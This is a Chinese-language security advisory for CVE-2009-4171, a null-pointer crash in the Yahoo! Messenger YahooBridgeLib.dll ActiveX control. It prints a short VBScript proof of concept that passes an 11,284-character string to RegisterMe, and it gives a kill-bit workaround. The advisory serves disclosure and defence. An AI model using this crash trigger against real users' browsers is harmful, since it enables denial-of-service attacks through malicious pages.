发布日期：2009-11-12
更新日期：2009-11-13

受影响系统：

Yahoo! Messenger 9.0.0.2162

描述：

---

BUGTRAQ  ID: 37007
CVE(CAN) ID: CVE-2009-4171

雅虎通是一款非常流行的即时通讯工具。

雅虎通所安装的YahooBridgeLib.dll Activex控件没有正确地验证用户所传送的超长参数。如果用户受骗访问了恶意网页并传送了超长参数，就可能触发空指针引用，导致浏览器崩溃。

<*来源：HACKATTACK IT SECURITY GmbH
  
  链接：http://marc.info/?l=bugtraq&m=125804421323518&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?XML version='1.0' standalone='yes' ?>

<package><job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />

<script language='vbscript'>


arg1=String(11284, "A")

target.RegisterMe arg1

</script>

</job>

</package>

建议：

---

临时解决方法：

* 为clsid 58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86设置kill-bit。

厂商补丁：

Yahoo!
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://messenger.yahoo.com/

浏览次数：2380
严重程度：0（网友投票）